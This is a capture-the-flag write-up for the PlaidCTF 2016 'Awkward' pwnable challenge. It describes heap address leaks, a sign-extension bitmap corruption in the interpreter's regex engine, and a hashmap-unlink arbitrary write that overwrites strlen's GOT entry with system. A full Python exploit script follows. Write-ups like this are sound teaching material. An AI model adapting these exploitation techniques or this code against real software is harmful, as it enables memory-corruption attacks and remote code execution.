PlaidCTF 2016 – Awkward [Pwnable 600]

Awkward was an exploitation challenge, providing a pretty serious “awk” like interpreter, with a variety of different bugs.

I used IDA and Hex-Rays extensively to reverse it.

After a bit of reversing, I got it running simple programs like this:

START { }
FINISH { printf "%d", 1; }

And, mostly by lucky guess found the information leak vulnerability, where printf failed to check types, allowing leaking heap addresses with:

 printf "%x", "string";

And reading strings from arbitrary addresses with:

 printf "%s", 12345678;

This was all I had for probably 10 hours. I reversed most of the interpreter, the hash-map, deeply investigated some weird behaviour with regards to string splitting, field-separators and string joining. Nothing. Eventually I found another (probably unintended) information leak vulnerability, which looked like:

 "string"; x = y;

If y was an uninitialized variable, x would become the address of “string”.

Finally, and somewhat apprehensively, I embarked on reversing the last remaining component: the regex engine. Finally, I found the corruption bug – when parsing character sets ([abc] notation), the byte values were being sign-extended before writing bits into a bitmap.

Screen Shot 2016-04-18 at 10.23.37 PM.png

(v24 is an int, from a sign-extended character)

This allowed setting bits before the start of the bitmap using bytes 80 to FF. This allows only a handful of fields to be corrupted. Long story short, there was a “next” pointer field which was initialised to NULL earlier in the structure. I could write into it bit-by-bit, and as long as it was the last thing in the regex it would keep the new value (otherwise it would be overwritten by a real next value).

I took some notes on which byte values mapped to which bits, just by trying it and looking at the crash address in gdb, and eventually figured out the rules. I probably should have used a mathematical approach to calculate it, but sometimes it’s safer to just trust what you can see:

 # NOTE: 0xC0 -> 1
 # NOTE: 0xB9 -> 2
 # NOTE: 0xBA -> 4
 # NOTE: 0xBB -> 8
 # NOTE: 0xBC -> 10
 # NOTE: 0xBF -> 80
 # NOTE: 0xC8 -> 100
 # NOTE: 0xC1 -> 200
 # NOTE: 0xC2 -> 400
 # NOTE: 0xC7 -> 8000

I combined it into the following python for setting an arbitrary address:

 target = 0x12345678
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 chrs = ''
 for i in range(0, 32):
     if target & (1 << i):
         chrs += chr(lookup[i])
 print 'print ' + str(i) + ', "hello" ~ /[' + chrs + ']/;'

I spent a few hours poking around different options for what to confuse with a “next” node before realising that if the first byte is a safe value it doesn’t crash and just frees the provided address.

I spent longer pondering what I should free before deciding on the “fields” array (pretty much the only array the code can access). This is an array of char* that is initialised by splitting the input line, but you can reallocate it to be a pretty arbitrary size by assigning to it. You can then write pointers to arbitrary strings into it. Pretty convenient, right?

fields-array.png

I found the address of the fields array by leaking some strings on either side of it in the heap and adding a constant offset:

 str = "aaaabbbbccccddddeeeeffffgggghhhh";
 # duplicate the string and get its address a few times
 str; q = z;
 str; r = z;
 str; s = z;
 str; t = z;
 # reallocate fields array
 $128 = "1";
 # get one after it for reference
 str; u = z;
 # dump the addresses
 printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
 printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;
 x = t + 112;
 printf "fields array: %x\n", x;

I then rewrote my arbitrary-free to use awk to construct the regex:

 code = 's = "he[";\n'
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 for i in range(31, -1, -1):
     code += 'if (x >= ' + str(1<<i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1<<i) + '; }\n'
 code += 's = s "]";\n'
 code += 'print "hello" ~ s;\n'

So, this is enough to free the fields array, but I needed to turn it into an arbitrary write. I chose to use the linked list removal operation of the variable hashmap for this (a super awkward technique, as you’ll see).

Screen Shot 2016-04-18 at 9.56.48 PM.png

Once the fields-array was freed, I declared a new variable to reallocate the variables hashmap into the freed memory (and I declared enough variables earlier to make sure that this would cross the 70% threshold on line 61).

Because I could leak the address of arbitrary string data I could construct some very complex structures in memory. I used this to create a fake hashmap_entry structure, with the name pointing to a real name string. I inserted this structure in the correct slot in the hashmap by writing into the fields array, then declared a real variable with the same name, running the unlinking code in the listing above.

I wanted to use the code on line 38 write to an arbitrary address, but unfortunately the “next” address had to be a valid address as well. To solve this I leaked the address of a large string in memory, and chose offsets into the string to control the low byte of the address. This allowed an arbitrary pointer to be written by repeating the “unlinking” primitive four times (increasing the write address each time).

I used the printf leak to leak the address of strlen from the GOT then added an offset to find the address of system (since my local libc was the same), and used the unlinking technique to replace the value. strlen was used by printf when printing strings, so after corruption I could get the flag by writing:

 printf "%s\n", "cat flag\n"; 

Full Code

The full code for my exploit (in all of its hasty awkward messiness) is listed below. It has a few more tricks that hopefully don’t need too much explanation. I’m afraid I used a rather inappropriate variable name (after 20 hours of hitting my head against this problem I was a bit frustrated), and then hardcoded the hash value making it too error-prone to change after the fact. Sorry.

import socket
import struct
import random
import string
import time
import sys

ADDRESS = ('192.168.46.138', 10241)
ADDRESS = ('awkward.pwning.xxx', 2323)
VERBOSE = True
VERBOSE = False

sock = socket.create_connection(ADDRESS)
def read_byte():
    buf = sock.recv(1)
    if not buf:
        raise EOFError
    return buf

def read_n(n):
    s = ''.join(read_byte() for i in range(n))
    if VERBOSE:
        print '<', `s`
    return s

def read_until(sentinel='\n'):
    s = ''
    while not s.endswith(sentinel):
        b = read_byte()
        if VERBOSE:
            sys.stdout.write(repr(b)[1:-1])
            if b == '\n':
                sys.stdout.write('\n')
            sys.stdout.flush()
        s += b
    return s

def send(s):
    if VERBOSE:
        print '>', `s`
    sock.sendall(s)

program = '''
BEGIN { }
{
    FS = "xyz";
    if ( $1 == "r" ) { printf ">>>%s<<<\n", 0 + $2; }
    if ( $1 == "a" ) { printf ">>>%d<<<\n", $2; }
    if ( $1 == "s" ) { saved0 = $2; saved1 = $3; saved2 = $4; saved3 = $5; }
    if ( $1 == "l" )
    {'''
for i in range(5):
    program += "padding%d = \"0\";" % i;
program += '''
        str = "aaaabbbbccccddddeeeeffffgggghhhh";
        str; q = z;
        str; r = z;
        str; s = z;
        str; t = z;
        $128 = "1";
        str; u = z;

        print q;
        printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
        printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;

        x = t + 112;
        #x = 305419896;
        printf "freeing %x\n", x;

        s = "he[";
'''
lookup = [0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) + [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8)
for i in range(31, -1, -1):
    program += 'if (x >= ' + str(1 << i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1 << i) + '; }\n'
program += '''
        s = s "]";
        print x;
        print s;
        print "hello" ~ s;
        realloc = 1;
        $50 = saved0;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved1;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved2;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved3;
        print "alive";
        fuck = 1;
        print "alive?";

        printf "%s\n", "cat flag\n"; 
        print "alive??";
    }
}
FINISH { }
'''

#0xf75cb180 <system
#0xf7607690 <strlen

read_until('Program?')
send(program)
read_until('Ready.')


def read_address_string(a):
    send("rxyz%d\n" % (a,))
    read_until('>>>')
    return read_until('<<<')[:-3]

def get_address_of_string(a):
    assert ' ' not in a and '\n' not in a
    send("axyz%s\n" % (a,))
    read_until('>>>')
    return int(read_until('<<<')[:-3])

def read_at_least(a, n):
    r = ''
    while len(r) < n:
        r += read_address_string(a + len(r)) + '\0'
    return r

def read_dword(a):
    return struct.unpack_from('I', read_at_least(a, 4))[0]

strlen_got = 0x8052040
strlen = read_dword(strlen_got)

system = strlen + (0xf759b180-0xf75e13c0)
print hex(strlen)

junk_string = 'a' * 1024

scratch_start = get_address_of_string(junk_string)

name = get_address_of_string('fuck')
def generate_block(write_to, byte):
    target = (scratch_start + 256) & ~0xFF
    next_in_chain = prev_in_chain = next_ = prev = cache = target + byte
    type_ = 0x41414141
    value = 0x41414141

    next_offset = 0x8
    prev = write_to - next_offset


    print map(hex, (next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache))
    return struct.pack('IIIIIIII', next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache);

def do_hash(name):
    h = 0
    for i in name:
        h = ord(i) + 1337 * h
    return h

def save(a,b,c,d):
    for s in (a,b,c,d):
        assert '\n' not in s, `s`
        assert 'xyz' not in s, `s`
        assert '\0' not in s, `s`
    send("sxyz%sxyz%sxyz%sxyz%s\n" % (a,b,c,d))

print do_hash('fuck') % 64

save(
    generate_block(strlen_got, (system & 0xFF)),
    generate_block(strlen_got+1, ((system >> 8) & 0xFF)),
    generate_block(strlen_got+2, ((system >> 16) & 0xFF)),
    generate_block(strlen_got+3, ((system >> 24) & 0xFF)),
    )
raw_input('attach?') # ps aux | grep ' ./awkw' | grep -v grep | cut -c10-15
send('lxyzaxyzb\n')
VERBOSE = True
read_until('xxxxx')

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s